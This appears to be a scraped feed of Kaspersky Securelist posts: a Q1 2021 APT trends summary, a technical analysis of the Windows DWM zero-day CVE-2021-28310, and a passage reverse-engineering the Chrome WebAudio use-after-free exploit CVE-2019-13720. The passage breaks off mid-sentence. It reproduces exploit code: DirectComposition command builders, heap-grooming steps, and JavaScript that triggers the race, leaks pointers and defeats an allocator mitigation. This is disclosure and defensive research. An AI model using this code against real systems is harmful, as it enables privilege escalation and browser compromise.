several versions, with the more recent one used for at least three and a half years to target individuals in parallel to the group's mobile campaigns. The implant functionality and infrastructure in that version have remained the same all along, and have been used in the group's activity witnessed this year.\n\nFerocious Kitten is an APT group that has been active against Persian-speaking individuals since 2015 and appears to be based in Iran. Although it has been active over a large timespan, the group has mostly operated under the radar and, to the best of our knowledge, has not been covered by security researchers. It only recently attracted attention when a lure document was uploaded to VirusTotal and was brought to public knowledge by researchers on Twitter. Subsequently, one of its implants was analyzed by a Chinese intelligence firm. We have been able to expand some of the findings on the group and provide insights on additional variants. The malware dropped from the aforementioned document is dubbed MarkiRAT and is used to record keystrokes and clipboard content, provide file download and upload capabilities as well as the ability to execute arbitrary commands on the victim's machine. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method. Interestingly, some of the TTPs used by this threat actor are reminiscent of other groups operating in the domain of dissident surveillance. For example, it used the same C2 domains across its implants for years, which was witnessed in the activity of Domestic Kitten. In the same vein, the Telegram execution hijacking technique observed in this campaign by Ferocious Kitten was also observed being used by Rampant Kitten, as covered by Check Point. In our private report, we expand the details on these findings as well as provide analysis and mechanics of the MarkiRAT malware.\n\nKarkadann is a threat actor that has been targeting government bodies and news outlets in the Middle East since at least October 2020. The threat actor leverages tailor-made malicious documents with embedded macros that trigger an infection chain, opening a URL in Internet Explorer. The minimal functionality present in the macros and the browser specification suggest that the threat actor might be exploiting a privilege-escalation vulnerability in Internet Explorer. Despite the small amount of evidence available for analysis in the Karkadann case, we were able to find several similarities to the Piwiks case, a watering-hole attack we discovered that targeted multiple prominent websites in the Middle East. Our private report presents the recent Karkadann campaigns and the similarities between this campaign and the Piwiks case. The report concludes with some infrastructure overlaps with unattributed clusters that we have seen since last year that are potentially linked to the same threat actor.\n\n## Southeast Asia and Korean Peninsula\n\nWe discovered that the Kimsuky group adopted a new method to deliver its malware in its latest campaign on a South Korean stock trading application. In this campaign, beginning in December 2020, the group compromised a website belonging to the vendor of stock trading software, replacing the hosted installation package with a malicious one. Kimsuky also delivered its malware by utilizing a malicious Hangul (HWP) document containing COVID-19-related bait that discusses a government relief fund. Both infection vectors ultimately deliver the Quasar RAT. Compared to Kimsuky's last reported infection chain, composed of various scripts, the new scheme adds complications and introduces less popular file types, involving VBS scripts, XML and Extensible Stylesheet Language (XSL) files with embedded C# code in order to fetch and execute stagers and payloads. Based on the lure document and characteristics of the compromised installation package, we conclude that this attack is financially motivated, which, as we have previously reported, is one of Kimsuky's main focus areas.\n\nOn January 25, the Google Threat Analysis Group (TAG) announced that a North Korean-related threat actor had targeted security researchers. According to Google TAG's blog, this actor used highly sophisticated social engineering, approached security researchers through social media, and delivered a compromised Visual Studio project file or lured them to their blog and installed a Chrome exploit. On March 31, Google TAG released an update on this activity showing another wave of fake social media profiles and a company the actor set up mid-March. We can confirm that several infrastructures on the blog overlap with our previously published reporting about Lazarus group's ThreatNeedle cluster. Moreover, the malware mentioned by Google matched ThreatNeedle \u2013 malware that we have been tracking since 2018. While investigating associated information, a fellow external researcher confirmed that he was also compromised by this attack, sharing information for us to investigate. We discovered additional C2 servers after decrypting configuration data from the compromised host. The servers were still in use during our investigation, and we were able to get additional data, analyzing logs and files present on the servers. We assess that the published infrastructure was used not only to target security researchers but also in other Lazarus attacks. We found a relatively large number of hosts communicating with the C2s at the time of our research. You can read our public report [here](<https://securelist.com/lazarus-threatneedle/100803/>).\n\nFollowing up our previous investigation into Lazarus attacks on the defense industry using ThreatNeedle, we discovered another malware cluster named CookieTime used in a campaign mainly focused on the defense industry. We detected activity in September and November 2020, with samples dating back to April 2020. Compared to the already known malware clusters of the Lazarus group, CookieTime shows a different structure and functionality. This malware communicates with the C2 server using the HTTP protocol. In order to deliver the request type to the C2 server, it uses encoded cookie values and fetches command files from the C2 server. The C2 communication takes advantage of steganography techniques, delivered in files exchanged between infected clients and the C2 server. The contents are disguised as GIF image files, but contain encrypted commands from the C2 server and command execution results. We had a chance to look into the command and control script as a result of working closely with a local CERT to take down the threat actor's infrastructure. The malware control servers are configured in a multi-stage fashion and only deliver the command file to valuable hosts.\n\nWhile investigating the artifacts of a supply-chain attack on the Vietnam Government Certification Authority's (VGCA) website, we discovered that the first Trojanized package dates to June 2020. Unravelling that thread, we identified a number of post-compromise tools in the form of plugins deployed using PhantomNet malware, which was delivered using Trojanized packages. Our analysis of these plugins revealed similarities with the previously analyzed CoughingDown malware. In our private report, we offer a detailed description for each post-compromise tool used in the attack, as well as other tools belonging to the actor's arsenal. Finally, we also explore CoughingDown attribution in the light of recent discoveries.\n\nOn February 10, DBAPPSecurity published details about a zero-day exploit they discovered last December. Aside from the details of the exploit itself, researchers also mentioned it being used in the wild by BitterAPT. While no such subsequent information was given in the initial report to explain the attribution claims, our investigation into this activity confirms the exploit was in fact being used exclusively by this actor. We assigned the name TurtlePower to the campaign that makes use of this exploit, along with the other tools used to target governmental and telecom entities in Pakistan and China. We have also confidently linked the origin of this exploit to a broker we refer to as Moses. Moses has been responsible for the development of at least five exploits patched in the last two years. We have also been able to tie the usage of some of these exploits to at least two different actors thus far \u2013 BitterAPT and DarkHotel. At this time, it is unclear how these threat actors are obtaining exploits from Moses, whether it is through direct purchase or another third-party provider. During the TurtlePower campaign, BitterAPT used a wide array of tools on its victims to include a stage one payload named ArtraDownloader, a stage two payload named Splinter, a keylogger named SourLogger, an infostealer named SourFilling, as well as variations of Mimikatz to gather specific files and maintain its access. This particular campaign also appears to be narrowly focused on targets within Pakistan and China (based on the initial report referenced). While we can verify specific targeting within Pakistan using our own data, we have not been able to do the same regarding China. Use of CVE-2021-1732 peaked between June and July 2020, but the overall campaign is still ongoing.\n\nIn 2020, we observed new waves of attacks related to Dropping Elephant (aka Patchwork, Chinastrats), focusing on targets in China and Pakistan. We also noted a few targets outside of the group's traditional area of operations, namely in the Middle East, and a growing interest in the African continent. The attacks followed the group's well-established TTPs, which include the use of malicious documents crafted to exploit a remote code execution vulnerability in Microsoft Office, and the signature JakyllHyde (aka BadNews) Trojan in the later infection stages. Dropping Elephant introduced a new loader for JakyllHyde, a tool we named Crypta. It contains mechanisms to hinder detection and appears to be a core component of this APT actor's recent toolset. Crypta and its variants have been observed in multiple scenarios loading a wide range of subsequent payloads, such as Bozok RAT, Quasar RAT and LokiBot. An additional Trojan discovered during our research was PubFantacy. To our knowledge, this tool has never been publicly described and has been used to target Windows servers since at least 2018.\n\nWe recently discovered a previously publicly unknown Android implant used in 2018-2019 by the SideWinder threat group, which we dubbed BroStealer. The main purpose of the BroStealer implant is to collect sensitive information from a victim's device, such as photos, SMS messages, call recordings and files from various messaging applications. Although SideWinder has numerous campaigns against victims using the Windows platform, recent reports have shown that this threat group also goes after its targets via the mobile platform.\n\n## Other interesting discoveries\n\nIn February 2019, multiple antivirus companies received a collection of malware samples, most of them associated with various known APT groups. Some of the samples cannot be associated with any known activity. Some, in particular, attracted our attention due to their sophistication. The samples were compiled in 2014 and, accordingly, were likely deployed in 2014 and possibly as late as 2015. Although we have not found any shared code with any other known malware, the samples have intersections of coding patterns, style and techniques that have been seen in various [Lambert families](<https://securelist.com/unraveling-the-lamberts-toolkit/77990/>). We therefore named this malware Purple Lambert. Purple Lambert is composed of several modules, with its network module passively listening for a magic packet. It is capable of providing an attacker with basic information about the infected system and executing a received payload. Its functionality reminds us of Gray Lambert, another user-mode passive listener. Gray Lambert turned out to be a replacement of the kernel-mode passive-listener White Lambert implant in multiple incidents. In addition, Purple Lambert implements functionality similar to, but in different ways, both Gray Lambert and White Lambert. Our report, available to subscribers of our APT threat reports, includes discussion of both the passive-listener payload and the loader functionality included in the main module.\n\n## Final thoughts\n\nWhile the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organization or compromising an individual's device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q1 2021:\n\n * Perhaps the most predominant attack we researched in this quarter was the SolarWinds attack. SolarWinds showed once again how successful a supply-chain attack can be, especially where attackers go the extra mile to remain hidden and maintain persistence in a target network. The scope of this attack is still being investigated as more zero-day flaws are discovered in SolarWinds products.\n * Another critical wave of attacks was the exploitation of Microsoft Exchange zero-day vulnerabilities by multiple threat actors. We recently discovered another campaign using these exploits with different targeting, possibly related to the same cluster of activities already reported.\n * Lazarus group's bold campaign targeting security researchers worldwide also utilized zero-day vulnerabilities in browsers to compromise their targets. Their campaigns used themes centered on the use of zero-days to lure relevant researchers, possibly in an attempt to steal vulnerability research.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2021-04-27T10:00:26", "type": "securelist", "title": "APT trends report Q1 2021", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-1732"], "modified": "2021-04-27T10:00:26", "id": "SECURELIST:A10F281EF99381636376D6F6C6501E22", "href": "https://securelist.com/apt-trends-report-q1-2021/101967/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-29T16:18:40", "description": "\n\nWhile analyzing the [CVE-2021-1732 exploit](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) originally discovered by the DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we discovered another zero-day exploit we believe is linked to the same actor. We reported this new exploit to Microsoft in February and after confirmation that it is indeed a zero-day, it received the designation CVE-2021-28310. Microsoft [released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) to this vulnerability as a part of its April security updates.\n\nWe believe this exploit is used in the wild, potentially by several threat actors. It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access. Unfortunately, we weren't able to capture a full chain, so we don't know if the exploit is used with another browser zero-day, or coupled with known, patched vulnerabilities.\n\n \nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. In fact, over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone. In this blog we provide a technical analysis of the vulnerability and how the bad guys exploited it. More information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## Technical details\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.). We've already published a [blogpost](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) about in-the-wild zero-days abusing DirectComposition API. DirectComposition API is implemented by the win32kbase.sys driver and the names of all related syscalls start with the string "NtDComposition".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/13101315/CVE_2021_28310_01.png>)\n\n_**DirectComposition syscalls in the win32kbase.sys driver**_\n\nFor exploitation only three syscalls are required: NtDCompositionCreateChannel, NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel. The NtDCompositionCreateChannel syscall initiates a channel that can be used together with the NtDCompositionProcessChannelBatchBuffer syscall to send multiple DirectComposition commands in one go for processing by the kernel in a batch mode. For this to work, commands need to be written sequentially in a special buffer mapped by NtDCompositionCreateChannel syscall. Each command has its own format with a variable length and list of parameters.\n \n \n enum DCOMPOSITION_COMMAND_ID\n {\n \tProcessCommandBufferIterator,\n \tCreateResource,\n \tOpenSharedResource,\n \tReleaseResource,\n \tGetAnimationTime,\n \tCapturePointer,\n \tOpenSharedResourceHandle,\n \tSetResourceCallbackId,\n \tSetResourceIntegerProperty,\n \tSetResourceFloatProperty,\n \tSetResourceHandleProperty,\n \tSetResourceHandleArrayProperty,\n \tSetResourceBufferProperty,\n \tSetResourceReferenceProperty,\n \tSetResourceReferenceArrayProperty,\n \tSetResourceAnimationProperty,\n \tSetResourceDeletedNotificationTag,\n \tAddVisualChild,\n \tRedirectMouseToHwnd,\n \tSetVisualInputSink,\n \tRemoveVisualChild\n };\n\n**_List of command IDs supported by the function DirectComposition::CApplicationChannel::ProcessCommandBufferIterator_**\n\nWhile these commands are processed by the kernel, they are also serialized into another format and passed by the Local Procedure Call (LPC) protocol to the Desktop Window Manager (dwm.exe) process for rendering to the screen. This procedure could be initiated by the third syscall \u2013 NtDCompositionCommitChannel.\n\nTo trigger the vulnerability the discovered exploit uses three types of commands: CreateResource, ReleaseResource and SetResourceBufferProperty.\n \n \n void CreateResourceCmd(int resourceId)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = CreateResource;\n \tbuf[1] = resourceId;\n \tbuf[2] = PropertySet; // MIL_RESOURCE_TYPE\n \tbuf[3] = FALSE;\n \tBatchLength += 16;\n }\n \n void ReleaseResourceCmd(int resourceId)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = ReleaseResource;\n \tbuf[1] = resourceId;\n \tBatchLength += 8;\n }\n \n void SetPropertyCmd(int resourceId, bool update, int propertyId, int storageOffset, int hidword, int lodword)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = SetResourceBufferProperty;\n \tbuf[1] = resourceId;\n \tbuf[2] = update;\n \tbuf[3] = 20;\n \tbuf[4] = propertyId;\n \tbuf[5] = storageOffset;\n \tbuf[6] = _D2DVector2; // DCOMPOSITION_EXPRESSION_TYPE\n \tbuf[7] = hidword;\n \tbuf[8] = lodword;\n \tBatchLength += 36;\n }\n\n_**Format of commands used in exploitation**_\n\nLet's take a look at the function CPropertySet::ProcessSetPropertyValue in dwmcore.dll. This function is responsible for processing the SetResourceBufferProperty command. We are most interested in the code responsible for handling DCOMPOSITION_EXPRESSION_TYPE = D2DVector2.\n \n \n int CPropertySet::ProcessSetPropertyValue(CPropertySet *this, ...)\n {\n ...\n \n if (expression_type == _D2DVector2)\n {\n if (!update)\n {\n CPropertySet::AddProperty<D2DVector2>(this, propertyId, storageOffset, _D2DVector2, value);\n }\n else\n {\n if ( storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF )\n {\n goto fail;\n }\n \n CPropertySet::UpdateProperty<D2DVector2>(this, propertyId, _D2DVector2, value);\n }\n }\n \n ...\n }\n \n int CPropertySet::AddProperty<D2DVector2>(CResource *this, unsigned int propertyId, int storageOffset, int type, _QWORD *value)\n {\n int propertyIdAdded;\n \n int result = PropertySetStorage<DynArrayNoZero,PropertySetUserModeAllocator>::AddProperty<D2DVector2>(\n this->propertiesData,\n type,\n value,\n &propertyIdAdded);\n if ( result < 0 )\n {\n return result;\n }\n \n if ( propertyId != propertyIdAdded || storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF )\n {\n return 0x88980403;\n }\n \n result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);\n if ( result < 0 )\n {\n return result;\n }\n \n return 0;\n }\n \n int CPropertySet::UpdateProperty<D2DVector2>(CResource *this, unsigned int propertyId, int type, _QWORD *value)\n {\n if ( this->properties[propertyId]->type == type )\n {\n *(_QWORD *)(this->propertiesData + (this->properties[propertyId]->offset & 0x1FFFFFFF)) = *value;\n \n int result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);\n if ( result < 0 )\n {\n return result;\n }\n \n return 0;\n }\n else\n {\n return 0x80070057;\n }\n }\n\n**_Processing of the SetResourceBufferProperty (D2DVector2) command in dwmcore.dll_**\n\nFor the SetResourceBufferProperty command with the expression type set to D2DVector2, the function CPropertySet::ProcessSetPropertyValue(\u2026) would either call CPropertySet::AddProperty<D2DVector2>(\u2026) or CPropertySet::UpdateProperty<D2DVector2>(\u2026) depending on whether the update flag is set in the command. The first thing that catches the eye is the way the new property is added in the CPropertySet::AddProperty<D2DVector2>(\u2026) function. You can see that it adds a new property to the resource, but it only checks if the propertyId and storageOffset of a new property are equal to the provided values after the new property is added, and returns an error if that's not the case. Checking something after a job is done is bad coding practice and can result in vulnerabilities. However, a real issue can be found in the CPropertySet::UpdateProperty<D2DVector2>(\u2026) function. No check takes place that will ensure if the provided propertyId is less than the count of properties added to the resource. As a result, an attacker can use this function to perform an OOB write past the propertiesData buffer if it manages to bypass two additional checks for data inside the properties array.\n \n \n (1)\tstorageOffset == this->properties[propertyId]->offset & 0x1FFFFFFF\n (2)\tthis->properties[propertyId]->type == type\n\n_**Conditions which need to be met for exploitation in dwmcore.dll**_\n\nThese checks could be bypassed if an attacker is able to allocate and release objects in the dwm.exe process to groom heap into the desired state and spray memory at specific locations with fake properties. The discovered exploit manages to do this using the CreateResource, ReleaseResource and SetResourceBufferProperty commands.\n\nAt the time of writing, we still hadn't analyzed the updated binaries that are fixing this vulnerability, but to exclude the possibility of other variants for this vulnerability Microsoft would need to check the count of properties for other expression types as well.\n\nEven with the above issues in dwmcore.dll, if the desired memory state is achieved to bypass the previously mentioned checks and a batch of commands are issued to trigger the vulnerability, it still won't be triggered because there is one more thing preventing it from happening.\n\nAs mentioned above, commands are first processed by the kernel and only after that are they sent to Desktop Window Manager (dwm.exe). This means that if you try to send a command with an invalid propertyId, NtDCompositionProcessChannelBatchBuffer syscall will return an error and the command will not be passed to the dwm.exe process. SetResourceBufferProperty commands with expression type set to D2DVector2 are processed in the win32kbase.sys driver with the functions DirectComposition::CPropertySetMarshaler::AddProperty<D2DVector2>(\u2026) and DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(\u2026), which are very similar to those present in dwmcore.dll (it's quite likely they were copy-pasted). However, the kernel version of the UpdateProperty<D2DVector2> function has one notable difference \u2013 it actually checks the count of properties added to the resource.\n \n \n int DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(DirectComposition::CPropertySetMarshaler *this, unsigned int *commandParams, _QWORD *value)\n {\n unsigned int propertyId = commandParams[0];\n unsigned int storageOffset = commandParams[1];\n unsigned int type = commandParams[2];\n \n if ( propertyId >= this->propertiesCount\n || storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF)\n || type != this->properties[propertyId]->type )\n {\n return 0xC000000D;\n }\n else\n {\n *(_QWORD *)(this->propertiesData + (this->properties[propertyId]->offset & 0x1FFFFFFF)) = *value;\n ...\n }\n return 0;\n }\n\n_**DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(\u2026) in win32kbase.sys**_\n\nThe check for propertiesCount in the kernel mode version of the UpdateProperty<D2DVector2> function prevents further processing of a malicious command by its user mode twin and mitigates the vulnerability, but this is where DirectComposition::CPropertySetMarshaler::AddProperty<D2DVector2>(\u2026) comes in to play. The kernel version of the AddProperty<D2DVector2> function works exactly like its user mode variant and it also applies the same behavior of checking property after it has already been added and returns an error if propertyId and storageOffset of the created property do not match the provided values. Because of this, it's possible to use the AddProperty<D2DVector2> function to add a new property and force the function to return an error and cause inconsistency between the number of properties assigned to the same resource in kernel mode/user mode. The propertiesCount check in the kernel could be bypassed this way and malicious commands would be passed to Desktop Window Manager (dwm.exe).\n\nInconsistency between the number of properties assigned to the same resource in kernel mode/user mode could be a source of other vulnerabilities, so we recommend Microsoft to change the behavior of the AddProperty function and check properties before they are added.\n\nThe whole exploitation process for the discovered exploit is as follows:\n\n 1. Create a large number of resources with properties of specific size to get heap into predictable state.\n 2. Create additional resources with properties of specific size and content to spray memory at specific locations with fake properties.\n 3. Release resources created at stage 2.\n 4. Create additional resources with properties. These resources will be used to perform OOB writes.\n 5. Make holes among resources created at stage 1.\n 6. Create additional properties for resources created at stage 4. Their buffers are expected to be allocated at specific locations.\n 7. Create "special" properties to cause inconsistency between the number of properties assigned to the same resource in kernel mode/user mode for resources created at stage 4.\n 8. Use OOB write vulnerability to write shellcode, create an object and get code execution.\n 9. Inject additional shellcode into another system process.\n\nKaspersky products detect this exploit with the verdicts:\n\n * HEUR:Exploit.Win32.Generic\n * HEUR:Trojan.Win32.Generic\n * PDM:Exploit.Win32.Generic", "cvss3": {}, "published": "2021-04-13T17:35:50", "type": "securelist", "title": "Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0797", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2021-04-13T17:35:50", "id": "SECURELIST:A3D3514100806269750A23D748D34C59", "href": "https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-29T22:19:56", "description": "\n\nBack in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we've already published blog posts briefly describing this operation (available [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), in this blog post we'd like to take a deep technical dive into the exploits and vulnerabilities used in this attack.\n\n## Google Chrome remote code execution exploit\n\nIn the [original blog post](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following [commit](<https://chromium.googlesource.com/chromium/src.git/+/6a2e670a243b815cf043f8da4d26ecb9a64d307b>). A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:\n \n \n if (!buffer) {\n +\tBaseAudioContext::GraphAutoLocker context_locker(Context());\n +\tMutexLocker locker(process_lock_);\n \treverb_.reset();\n \tshared_buffer_ = nullptr;\n \treturn;\n\nAs you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.\n \n \n class MODULES_EXPORT ConvolverHandler final : public AudioHandler {\n ...\n std::unique_ptr<Reverb> reverb_;\n std::unique_ptr<SharedAudioBuffer> shared_buffer_;\n ...\n\nThese objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.\n\nThe exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the [PartitionAlloc](<https://github.com/scrapy/base-chromium/blob/master/allocator/partition_allocator/PartitionAlloc.md>) memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. All constants are taken from [partition_alloc_constants.h](<https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/partition_alloc_constants.h>):\n \n \n function getSuperPageBase(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet superPageBaseMask = ~superPageOffsetMask;\n \tlet superPageBase = addr & superPageBaseMask;\n \treturn superPageBase;\n }\n \n function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet partitionPageBase = partitionPageIndex << BigInt(14);\n \tlet finalAddr = superPageBase + partitionPageBase;\n \treturn finalAddr;\n }\n \n function getPartitionPageIndex(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \treturn partitionPageIndex;\n }\n \n function getMetadataAreaBaseFromPartitionSuperPage(addr) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet systemPageSize = BigInt(0x1000);\n \treturn superPageBase + systemPageSize;\n }\n \n function getPartitionPageMetadataArea(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \tlet pageMetadataSize = BigInt(0x20);\n \tlet partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;\n \treturn partitionPageMetadataPtr;\n }\n\nIt's interesting that the exploit also uses the relatively new built-in [BigInt](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt>) class to handle 64-bit values; authors usually use their own primitives in exploits.\n\nAt first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.\n \n \n let gcPreventer = [];\n let iirFilters = [];\n \n function initialSetup() {\n \tlet audioCtx = new OfflineAudioContext(1, 20, 3000);\n \n \tlet feedForward = new Float64Array(2);\n \tlet feedback = new Float64Array(1);\n \n \tfeedback[0] = 1;\n \tfeedForward[0] = 0;\n \tfeedForward[1] = -1;\n \n \tfor (let i = 0; i < 256; i++)\n iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));\n }\n\nAfter that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. It creates another huge OfflineAudioContext object and two ConvolverNode objects \u2013 ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.\n \n \n async function triggerUaF(doneCb) {\n \tlet audioCtx = new OfflineAudioContext(2, 0x400000, 48000);\n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \tlet scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);\n \tlet channelBuffer = audioCtx.createBuffer(1, 1, 48000);\n \n \tconvolver.buffer = channelBuffer;\n \tbufferSource.buffer = channelBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tchannelBuffer.getChannelData(0).fill(0);\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(scriptNode);\n \tscriptNode.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \tscriptNode.onaudioprocess = function(evt) {\n \t\tlet channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);\n \n \t\tfor (let j = 0; j < channelDataArray.length; j++) {\n \t\tif (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {\n \t\t\tlet u64Array = new BigUint64Array(1);\n \t\t\tlet u32Array = new Uint32Array(u64Array.buffer);\n \t\t\tu32Array[0] = channelDataArray[j + 0];\n \t\t\tu32Array[1] = channelDataArray[j + 1];\n \n \t\t\tlet leakedAddr = byteSwapBigInt(u64Array[0]);\n \t\t\tif (leakedAddr >> BigInt(32) > BigInt(0x8000))\n \t\t\tleakedAddr -= BigInt(0x800000000000);\n \t\t\tlet superPageBase = getSuperPageBase(leakedAddr);\n \n \t \t\tif (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {\n \t\t\tfinished = true;\n \t\t\tevt = null;\n \n \t\t\tbufferSource.disconnect();\n \t\t\tscriptNode.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\tsetTimeout(function() {\n \t\t\tdoneCb(leakedAddr);\n \t\t\t}, 1);\n \n \t\t\treturn;\n \t\t\t}\n \t\t}\n \t\t}\n \t};\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (!finished) {\n \t \tfinished = true;\n \t \ttriggerUaF(doneCb);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tconvolver.buffer = null;\n \t\tconvolver.buffer = channelBuffer;\n \t\tawait later(100); // wait 100 millseconds\n \t}\n };\n\nThis function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:\n \n \n function later(delay) {\n \treturn new Promise(resolve => setTimeout(resolve, delay));\n }\n\nDuring execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.\n\nThe PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:\n \n \n function byteSwapBigInt(x) {\n \tlet result = BigInt(0);\n \tlet tmp = x;\n \n \tfor (let i = 0; i < 8; i++) {\n \t\tresult = result << BigInt(8);\n \t\tresult += tmp & BigInt(0xFF);\n \t\ttmp = tmp >> BigInt(8);\n \t}\n \n \treturn result;\n }\n\nThe exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function 